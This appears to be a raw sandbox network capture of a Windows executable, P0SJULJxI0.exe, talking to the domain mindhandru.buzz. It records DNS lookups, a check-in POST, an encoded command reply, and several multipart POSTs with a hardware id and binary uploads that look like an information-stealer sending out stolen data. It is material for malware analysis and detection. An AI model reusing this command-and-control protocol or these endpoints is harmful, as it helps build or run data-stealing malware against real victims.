Dec 26, 2024 12:50:11.279934883 CET  50737  53  192.168.2.8  1.1.1.1
Dec 26, 2024 12:50:11.509972095 CET  53  50737  1.1.1.1  192.168.2.8

Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Dec 26, 2024 12:49:11.101495028 CET  192.168.2.8  1.1.1.1  0xa7f4  Standard query (0)  mindhandru.buzz  A (IP address)  IN (0x0001)  false
Dec 26, 2024 12:50:11.279934883 CET  192.168.2.8  1.1.1.1  0xf210  Standard query (0)  mindhandru.buzz  A (IP address)  IN (0x0001)  false

Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 26, 2024 12:49:11.240886927 CET  1.1.1.1  192.168.2.8  0xa7f4  No error (0)  mindhandru.buzz  (none)  172.67.165.185  A (IP address)  IN (0x0001)  false
Dec 26, 2024 12:49:11.240886927 CET  1.1.1.1  192.168.2.8  0xa7f4  No error (0)  mindhandru.buzz  (none)  104.21.11.101  A (IP address)  IN (0x0001)  false
Dec 26, 2024 12:50:11.509972095 CET  1.1.1.1  192.168.2.8  0xf210  No error (0)  mindhandru.buzz  (none)  172.67.165.185  A (IP address)  IN (0x0001)  false
Dec 26, 2024 12:50:11.509972095 CET  1.1.1.1  192.168.2.8  0xf210  No error (0)  mindhandru.buzz  (none)  104.21.11.101  A (IP address)  IN (0x0001)  false

• mindhandru.buzz
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.8  49704  172.67.165.185  443  5272  C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-26 11:49:12 UTC  262  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mindhandru.buzz
2024-12-26 11:49:12 UTC  8  OUT  Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-26 11:49:24 UTC  1127  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:49:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ad1tulqrge1up50t27nvq5i316; expires=Mon, 21 Apr 2025 05:36:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvhaSm3Wyqk7q%2B%2BOAGGVXGzxIYGcaIjG9Gh%2FW292Ardi4q7XiQQdcEFBKefz2T2dDMWZP8GeBarbS%2BPLc9SH4EEY07BnrIe5M27fIXV3GqATHkdYXOy54wJub1tSu16A05E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d8a34f310f3d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1483&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1896103&cwnd=131&unsent_bytes=0&cid=0decf941a8ac3876&ts=11998&x=0"
2024-12-26 11:49:24 UTC  7  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-26 11:49:24 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.8  49705  172.67.165.185  443  5272  C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-26 11:49:25 UTC  263  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: mindhandru.buzz
2024-12-26 11:49:25 UTC  53  OUT  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:49:26 UTC  1121  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:49:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hk5317vj109rnmsdpuhmisj4p4; expires=Mon, 21 Apr 2025 05:36:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RL0actHrUce1c8lsv2A%2Bsn9emXcb7GlUR7Di53OUDK2WKlVa7vBitLR90O4aX5s4LudrQ3eeMkMvWVCRHpQU4vE99r5MYvpK92fBGAuwFy4Mht4X50%2BS2YyWHgLapl39pg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d8f689d78c9c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1769&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1597374&cwnd=196&unsent_bytes=0&cid=f23bb209fc9d8007&ts=799&x=0"
2024-12-26 11:49:26 UTC  248  IN  Data Raw: 31 34 38 64 0d 0a 4b 69 4d 71 66 6a 33 6a 2b 53 32 55 35 4b 63 51 45 42 6f 51 47 59 35 73 2f 4a 79 70 6f 6c 7a 4e 4e 6e 70 79 34 75 57 47 34 30 56 52 41 56 78 63 42 39 66 56 44 2b 65 42 68 53 70 6b 61 47 56 38 6f 6b 36 64 2b 49 75 59 4f 71 78 61 43 52 66 4f 78 2f 43 4f 5a 78 42 46 53 78 4a 4f 68 74 55 50 38 5a 79 46 4b 6b 74 68 4d 6e 7a 67 54 73 61 2b 7a 4d 67 2b 72 46 6f 59 45 34 6d 4b 39 6f 38 6d 51 6b 39 4e 46 6c 69 41 6e 55 7a 34 69 63 4a 31 64 58 74 36 64 2b 63 42 6c 50 47 4c 6a 6e 36 6f 54 46 68 49 77 4b 6a 6a 6c 79 52 6e 51 6c 6b 56 48 35 37 56 56 72 61 42 79 54 49 71 4f 48 46 38 37 41 43 61 2b 4d 4c 4b 4e 4b 56 53 47 52 61 49 6c 65 2b 46 4c 55 4a 42 54 68 64 53 69 59 6c 42 38 6f 37 4a 63 33 39 37 4d 6a 57 73 43 59 61 2b 6b 34
Data Ascii: 148dKiMqfj3j+S2U5KcQEBoQGY5s/JypolzNNnpy4uWG40VRAVxcB9fVD+eBhSpkaGV8ok6d+IuYOqxaCRfOx/COZxBFSxJOhtUP8ZyFKkthMnzgTsa+zMg+rFoYE4mK9o8mQk9NFliAnUz4icJ1dXt6d+cBlPGLjn6oTFhIwKjjlyRnQlkVH57VVraByTIqOHF87ACa+MLKNKVSGRaIle+FLUJBThdSiYlB8o7Jc397MjWsCYa+k4
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 42 74 6e 56 63 4a 41 5a 57 4b 39 49 64 6e 56 77 39 52 58 46 69 4e 32 78 65 32 6a 73 6c 38 64 33 74 39 66 4f 30 4f 6a 50 48 4c 77 7a 61 6e 55 42 49 66 6a 34 6a 71 69 79 42 41 53 45 38 54 57 49 6d 64 51 50 58 47 69 7a 4a 31 59 44 49 6a 72 43 36 4f 2f 63 6a 55 4d 37 34 55 42 31 36 5a 78 2b 4f 4e 5a 78 41 42 54 68 4a 65 6a 4a 74 64 2f 6f 33 4f 64 32 42 7a 65 33 62 68 44 70 50 30 78 4d 4d 2b 71 46 34 53 48 34 71 44 36 59 77 68 53 45 45 49 55 68 2b 47 67 77 2b 75 78 75 5a 33 59 6e 39 2b 62 61 34 30 33 75 47 46 32 58 36 6f 57 46 68 49 77 49 2f 68 67 69 52 44 54 6b 73 55 56 4a 4f 62 58 66 43 4c 77 47 42 30 66 58 78 78 37 78 79 55 38 4d 33 44 4e 36 52 64 48 52 65 45 78 36 72 42 49 46 41 42 45 46 78 2b 6a 4a 42 44 2f 4a 48 46 4d 6d 30 32 61 7a 76 72 41 74 36 6d 69
Data Ascii: BtnVcJAZWK9IdnVw9RXFiN2xe2jsl8d3t9fO0OjPHLwzanUBIfj4jqiyBASE8TWImdQPXGizJ1YDIjrC6O/cjUM74UB16Zx+ONZxABThJejJtd/o3Od2Bze3bhDpP0xMM+qF4SH4qD6YwhSEEIUh+Ggw+uxuZ3Yn9+ba403uGF2X6oWFhIwI/hgiRDTksUVJObXfCLwGB0fXxx7xyU8M3DN6RdHReEx6rBIFABEFx+jJBD/JHFMm02azvrAt6mi
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 55 56 6c 43 48 6e 36 54 5a 5a 32 4a 43 58 42 39 56 77 36 35 4d 2b 49 6a 43 5a 44 4a 6e 50 47 4b 73 43 5a 4b 2b 6b 34 41 7a 72 6c 77 65 41 6f 2b 4b 35 34 38 70 52 30 52 48 46 46 2b 42 6c 6b 72 79 6a 63 35 78 66 33 78 67 63 65 77 47 6d 2f 2f 42 79 6e 37 68 46 42 38 49 77 4e 2b 6b 73 44 42 44 41 33 30 66 55 59 2b 63 57 62 61 5a 69 32 73 79 66 33 34 37 74 45 36 54 39 73 37 46 4d 61 35 65 46 68 57 4b 69 2b 79 50 4a 46 70 4f 54 42 78 54 69 5a 46 43 2b 49 4c 4e 65 33 6c 7a 64 48 76 74 42 4e 36 77 69 38 63 6d 37 77 78 59 4a 49 65 4c 36 59 35 6c 66 55 4a 47 45 6c 69 58 32 31 43 34 6e 34 56 31 66 6a 67 71 4f 2b 41 48 6e 76 58 42 78 44 36 6f 57 52 30 54 68 34 54 70 68 69 31 47 52 6b 77 51 56 6f 79 64 54 2f 47 43 77 47 42 33 63 58 35 33 72 45 44 65 2b 64 4f 41 5a 75
Data Ascii: UVlCHn6TZZ2JCXB9Vw65M+IjCZDJnPGKsCZK+k4AzrlweAo+K548pR0RHFF+Blkryjc5xf3xgcewGm//Byn7hFB8IwN+ksDBDA30fUY+cWbaZi2syf347tE6T9s7FMa5eFhWKi+yPJFpOTBxTiZFC+ILNe3lzdHvtBN6wi8cm7wxYJIeL6Y5lfUJGEliX21C4n4V1fjgqO+AHnvXBxD6oWR0Th4Tphi1GRkwQVoydT/GCwGB3cX53rEDe+dOAZu
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 77 4e 2b 6b 69 43 35 61 54 30 59 56 55 6f 65 54 53 50 69 4c 7a 6e 52 35 66 33 56 39 34 51 61 54 2b 38 6a 42 4f 71 56 47 47 78 75 4b 69 75 37 42 61 51 68 47 55 46 77 48 77 62 78 44 33 35 62 65 59 47 51 34 62 54 58 31 54 70 6e 79 69 35 68 2b 72 46 73 52 48 34 69 50 36 34 34 6a 52 6b 64 4f 45 56 71 4f 6b 56 33 2b 69 4d 68 35 66 58 4e 67 65 2b 45 4b 6b 76 72 44 79 7a 54 76 47 6c 67 58 6d 4d 65 38 77 52 4a 46 54 6b 67 66 53 63 47 45 41 65 2f 47 77 6e 34 79 49 44 4a 33 34 67 36 52 38 73 66 4c 4e 71 35 59 46 68 65 46 6a 75 79 4a 4e 55 6c 46 51 42 31 52 6a 70 70 4c 38 34 50 42 64 58 5a 2b 66 54 75 69 54 70 6e 6d 69 35 68 2b 67 48 4d 74 55 71 47 39 70 4a 35 70 55 51 46 50 45 42 2f 5a 32 30 50 31 69 73 31 39 64 48 46 2b 63 65 55 46 6b 76 58 50 7a 44 65 71 55 68 6b
Data Ascii: wN+kiC5aT0YVUoeTSPiLznR5f3V94QaT+8jBOqVGGxuKiu7BaQhGUFwHwbxD35beYGQ4bTX1Tpnyi5h+rFsRH4iP644jRkdOEVqOkV3+iMh5fXNge+EKkvrDyzTvGlgXmMe8wRJFTkgfScGEAe/Gwn4yIDJ34g6R8sfLNq5YFheFjuyJNUlFQB1RjppL84PBdXZ+fTuiTpnmi5h+gHMtUqG9pJ5pUQFPEB/Z20P1is19dHF+ceUFkvXPzDeqUhk
2024-12-26 11:49:26 UTC  914  IN  Data Raw: 6f 59 75 57 6b 39 46 45 31 65 4a 6b 6b 37 79 67 38 68 30 66 6e 4a 7a 66 4f 49 41 6c 72 36 46 67 44 6d 33 46 45 42 51 6f 5a 66 2f 6b 7a 46 46 59 45 55 54 48 35 37 56 56 72 61 42 79 54 49 71 4f 48 74 70 36 41 4f 4d 39 38 7a 4f 4d 61 78 47 47 52 32 4c 6c 65 4f 4f 49 30 39 4e 54 68 4e 5a 67 4a 35 46 2b 6f 48 41 65 58 31 30 4d 6a 57 73 43 59 61 2b 6b 34 41 51 70 45 63 50 45 34 36 4d 38 70 70 6e 56 77 39 52 58 46 69 4e 32 78 65 32 68 63 35 35 64 6e 68 2b 65 2b 67 44 6e 75 7a 45 78 7a 6d 6d 58 77 6f 61 68 34 44 76 69 53 78 48 52 31 6f 51 55 5a 4f 65 58 65 54 47 69 7a 4a 31 59 44 49 6a 72 44 69 5a 37 74 76 44 66 4a 35 43 47 77 61 4c 69 75 6a 42 4f 41 5a 59 43 42 74 54 77 63 4d 50 38 49 6e 4d 63 58 31 35 65 33 66 68 43 35 66 37 79 73 59 36 70 56 34 59 46 6f 61 47
Data Ascii: oYuWk9FE1eJkk7yg8h0fnJzfOIAlr6FgDm3FEBQoZf/kzFFYEUTH57VVraByTIqOHtp6AOM98zOMaxGGR2LleOOI09NThNZgJ5F+oHAeX10MjWsCYa+k4AQpEcPE46M8ppnVw9RXFiN2xe2hc55dnh+e+gDnuzExzmmXwoah4DviSxHR1oQUZOeXeTGizJ1YDIjrDiZ7tvDfJ5CGwaLiujBOAZYCBtTwcMP8InMcX15e3fhC5f7ysY6pV4YFoaG
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 33 34 38 66 0d 0a 38 4e 35 63 58 4a 39 66 4f 6f 4b 6e 76 58 4d 7a 6a 69 71 58 78 46 51 7a 73 66 6a 6d 57 63 51 41 57 34 2f 54 5a 4f 70 51 66 57 64 68 57 30 38 59 54 4a 38 34 45 37 47 76 73 44 49 4d 62 31 52 45 52 69 45 6a 75 53 46 4c 55 56 47 53 42 6c 53 68 4a 39 42 38 6f 48 46 66 6e 31 2f 65 6e 54 6f 44 70 47 2b 68 59 41 35 74 78 52 41 55 4b 43 4d 38 71 41 70 51 31 4d 49 41 78 47 59 32 30 6a 36 78 70 30 79 66 48 46 7a 63 2b 49 43 6c 76 72 5a 77 44 57 6d 57 78 6b 66 67 49 54 6c 69 79 39 61 52 30 67 58 56 34 61 54 53 2f 69 55 78 48 30 79 4e 6a 4a 38 39 45 37 47 76 76 72 57 4f 61 68 62 57 6a 6d 48 6e 4f 57 4c 4a 45 4e 4e 43 41 4d 52 6d 4e 74 49 2b 73 61 64 4d 6e 39 30 66 33 2f 2b 41 70 37 2b 77 73 63 30 76 56 73 58 48 59 4f 48 34 5a 4d 6d 57 6b 35 44 47 56
Data Ascii: 348f8N5cXJ9fOoKnvXMzjiqXxFQzsfjmWcQAW4/TZOpQfWdhW08YTJ84E7GvsDIMb1RERiEjuSFLUVGSBlShJ9B8oHFfn1/enToDpG+hYA5txRAUKCM8qApQ1MIAxGY20j6xp0yfHFzc+IClvrZwDWmWxkfgITliy9aR0gXV4aTS/iUxH0yNjJ89E7GvvrWOahbWjmHnOWLJENNCAMRmNtI+sadMn90f3/+Ap7+wsc0vVsXHYOH4ZMmWk5DGV
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 35 49 33 58 65 58 70 37 66 48 50 6c 44 70 44 2b 79 73 30 2b 37 78 70 59 46 35 6a 48 76 4d 45 43 61 31 5a 65 46 68 32 69 6a 46 6e 38 67 63 6c 6b 65 58 6c 78 62 65 45 65 33 72 43 4c 30 54 6d 2b 46 45 41 47 6b 4a 44 6a 6e 6d 6c 52 41 55 38 51 48 39 6e 62 52 50 6d 49 79 48 6c 32 63 58 64 7a 37 77 75 62 39 4d 66 4d 50 36 64 64 45 68 57 46 67 65 36 43 4b 55 64 41 52 42 68 57 6a 35 49 50 75 4d 62 43 61 6a 49 67 4d 6b 33 38 43 59 62 7a 32 34 49 4d 72 45 55 4a 42 59 32 58 34 73 4d 49 53 30 31 4c 47 56 69 52 32 31 43 34 6e 34 56 31 66 6a 67 71 4f 2b 77 4b 6b 76 33 4d 7a 6a 47 69 57 78 38 62 6a 34 33 71 6b 79 68 4e 53 55 51 55 55 70 4f 52 52 65 53 50 7a 48 39 38 63 47 42 34 72 45 44 65 2b 64 4f 41 5a 75 39 6d 45 68 4f 4d 6b 65 6d 4f 5a 31 63 50 55 56 78 59 6a 64 73
Data Ascii: 5I3XeXp7fHPlDpD+ys0+7xpYF5jHvMECa1ZeFh2ijFn8gclkeXlxbeEe3rCL0Tm+FEAGkJDjnmlRAU8QH9nbRPmIyHl2cXdz7wub9MfMP6ddEhWFge6CKUdARBhWj5IPuMbCajIgMk38CYbz24IMrEUJBY2X4sMIS01LGViR21C4n4V1fjgqO+wKkv3MzjGiWx8bj43qkyhNSUQUUpORReSPzH98cGB4rEDe+dOAZu9mEhOMkemOZ1cPUVxYjds
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 54 49 38 4f 48 30 37 74 44 66 65 74 6f 76 2f 63 4f 39 4d 57 45 6a 41 73 75 65 50 4b 55 39 58 57 56 46 38 6c 6f 31 46 37 63 54 6a 64 57 4e 78 5a 48 62 2b 54 74 43 2b 7a 59 42 6d 2f 78 70 59 46 4a 48 48 76 4e 46 31 45 78 51 62 53 77 2f 54 68 41 48 76 78 74 4d 79 4b 69 6f 38 4f 2f 35 4f 78 72 36 4d 77 79 79 39 55 68 73 47 67 38 44 61 76 77 64 44 56 30 6b 52 56 49 32 6c 63 65 4f 46 79 33 78 31 62 6d 4d 37 6f 6b 36 52 76 70 50 35 66 75 63 55 4a 31 37 41 6e 36 54 5a 5a 33 31 43 52 68 4a 59 6c 34 6f 43 31 6f 33 54 63 33 39 7a 66 6a 6e 74 41 34 37 35 69 34 35 2b 71 52 52 41 51 4d 37 48 34 4a 42 6e 45 42 45 61 52 77 72 53 7a 42 2b 6b 6d 59 74 72 4d 6d 34 79 49 37 35 41 33 75 79 4c 6d 48 37 6f 56 77 6f 43 68 6f 54 79 67 6d 42 32 66 32 67 58 55 34 4b 58 54 76 48 47
Data Ascii: TI8OH07tDfetov/cO9MWEjAsuePKU9XWVF8lo1F7cTjdWNxZHb+TtC+zYBm/xpYFJHHvNF1ExQbSw/ThAHvxtMyKio8O/5Oxr6Mwyy9UhsGg8DavwdDV0kRVI2lceOFy3x1bmM7ok6RvpP5fucUJ17An6TZZ31CRhJYl4oC1o3Tc39zfjntA475i45+qRRAQM7H4JBnEBEaRwrSzB+kmYtrMm4yI75A3uyLmH7oVwoChoTygmB2f2gXU4KXTvHG
2024-12-26 11:49:26 UTC  1369  IN  Data Raw: 41 69 4b 62 64 62 7a 61 6d 62 6b 69 48 68 54 56 67 47 77 4e 2b 32 7a 32 64 61 41 52 42 63 47 49 4b 4a 58 66 43 46 30 33 45 31 52 6b 78 64 37 77 6d 59 2f 63 58 58 4c 2b 31 37 47 78 75 4d 69 2b 4f 58 47 58 5a 55 53 78 4a 52 68 6f 31 65 74 73 69 46 66 54 49 67 53 7a 76 39 42 4a 6d 79 67 34 77 76 76 46 6f 54 42 6f 66 48 32 38 39 6e 55 41 45 51 58 47 71 43 6c 55 48 78 6b 4e 51 2f 56 48 74 31 66 65 38 41 69 65 2b 4c 6a 6e 36 70 46 45 42 43 7a 73 66 67 6b 47 63 51 45 52 70 48 43 74 4c 4d 48 36 53 5a 69 32 73 79 62 6a 49 6a 76 30 44 65 37 49 75 59 66 75 68 61 46 52 47 44 69 65 65 54 4e 55 35 43 58 68 38 59 76 36 56 71 2b 34 76 41 66 48 56 47 54 46 72 6d 48 70 50 78 7a 50 34 41 6d 45 55 66 41 4d 4b 68 35 35 63 6b 43 41 38 49 42 42 2f 5a 32 32 37 38 6c 73 68 39 64
Data Ascii: AiKbdbzambkiHhTVgGwN+2z2daARBcGIKJXfCF03E1Rkxd7wmY/cXXL+17GxuMi+OXGXZUSxJRho1etsiFfTIgSzv9BJmyg4wvvFoTBofH289nUAEQXGqClUHxkNQ/VHt1fe8Aie+Ljn6pFEBCzsfgkGcQERpHCtLMH6SZi2sybjIjv0De7IuYfuhaFRGDieeTNU5CXh8Yv6Vq+4vAfHVGTFrmHpPxzP4AmEUfAMKh55ckCA8IBB/Z2278lsh9d


Session ID: 2
Source IP: 192.168.2.8
Source Port: 49707
Destination IP: 172.67.165.185
Destination Port: 443
PID: 5272
Process: C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:49:28 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XHG9JAW63CJSAIPNS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12846
Host: mindhandru.buzz
2024-12-26 11:49:28 UTC | 12846 | OUT | Data Ascii (raw hex omitted, CRLFs restored):
--XHG9JAW63CJSAIPNS
Content-Disposition: form-data; name="hwid"

D36554A76A033E98BEBA0C6A975F1733
--XHG9JAW63CJSAIPNS
Content-Disposition: form-data; name="pid"

2
--XHG9JAW63CJSAIPNS
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraf
2024-12-26 11:49:48 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:49:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=i64fblafgm9bvfntee0fq6dfj6; expires=Mon, 21 Apr 2025 05:36:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJjiH8tMWfuZLl0HbZPWC30Lm5WCmVVzbUefwhvCWUzwy6RClAOlTD%2BMMQpogv28%2BiTp3b6EXq989bTq8iGqcZtWXYONYNZJm3W58RbuNTmRG9jFPXT%2BKefM5IErbeVk7rk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d90678c14264-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1713&rtt_var=651&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13784&delivery_rate=1668571&cwnd=223&unsent_bytes=0&cid=9fcb402a78703aa3&ts=20539&x=0"
2024-12-26 11:49:48 UTC | 20 | IN | Data Ascii (chunked body, raw hex omitted, CRLFs restored):
f
ok 8.46.123.189
2024-12-26 11:49:48 UTC | 5 | IN | Data Ascii (terminating chunk):
0


Session ID: 3
Source IP: 192.168.2.8
Source Port: 49711
Destination IP: 172.67.165.185
Destination Port: 443
PID: 5272
Process: C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:49:50 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KYAYF5FBE89TQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15051
Host: mindhandru.buzz
2024-12-26 11:49:50 UTC | 15051 | OUT | Data Ascii (raw hex omitted, CRLFs restored):
--KYAYF5FBE89TQ
Content-Disposition: form-data; name="hwid"

D36554A76A033E98BEBA0C6A975F1733
--KYAYF5FBE89TQ
Content-Disposition: form-data; name="pid"

2
--KYAYF5FBE89TQ
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--KYAYF


Session ID: 4
Source IP: 192.168.2.8
Source Port: 49713
Destination IP: 172.67.165.185
Destination Port: 443
PID: 5272
Process: C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:50:12 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=4HAC1AYLFTF0J3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20224
Host: mindhandru.buzz
2024-12-26 11:50:12 UTC | 15331 | OUT | Data Ascii (raw hex omitted, CRLFs restored):
--4HAC1AYLFTF0J3
Content-Disposition: form-data; name="hwid"

D36554A76A033E98BEBA0C6A975F1733
--4HAC1AYLFTF0J3
Content-Disposition: form-data; name="pid"

3
--4HAC1AYLFTF0J3
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--4H
2024-12-26 11:50:12 UTC | 4893 | OUT | binary data (non-printable; raw dump omitted)
2024-12-26 11:50:13 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:50:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2jjlmspdrml7mdc9aq4o4o2a54; expires=Mon, 21 Apr 2025 05:36:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fF44mas9x8ePIDGFdcqoiAu5JDR0JvDbGrzknDfz0PiSTq2CBKWROJmkZE22Q%2B34AwoDd7Ak7iOmkLM04gY3HY4jP8S6LkDU0Ow4NdS4m4TMRzF%2FT%2FzaigBtPokrF9mvnI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80da1b3ad1430f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1746&rtt_var=659&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21181&delivery_rate=1672394&cwnd=214&unsent_bytes=0&cid=ca9454c2ddbb7b45&ts=1090&x=0"
2024-12-26 11:50:13 UTC | 20 | IN | Data Ascii (chunked body, raw hex omitted, CRLFs restored):
f
ok 8.46.123.189
2024-12-26 11:50:13 UTC | 5 | IN | Data Ascii (terminating chunk):
0


Session ID: 5
Source IP: 192.168.2.8
Source Port: 49714
Destination IP: 172.67.165.185
Destination Port: 443
PID: 5272
Process: C:\Users\user\Desktop\P0SJULJxI0.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:50:15 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UAQF6MBLGQ601
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1181
Host: mindhandru.buzz
2024-12-26 11:50:15 UTC | 1181 | OUT | Data Ascii (raw hex omitted, CRLFs restored):
--UAQF6MBLGQ601
Content-Disposition: form-data; name="hwid"

D36554A76A033E98BEBA0C6A975F1733
--UAQF6MBLGQ601
Content-Disposition: form-data; name="pid"

1
--UAQF6MBLGQ601
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--UAQF6
2024-12-26 11:50:52 UTC | 1138 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:50:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8tnmu5l98j8f4origbmq4omvom; expires=Mon, 21 Apr 2025 05:37:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
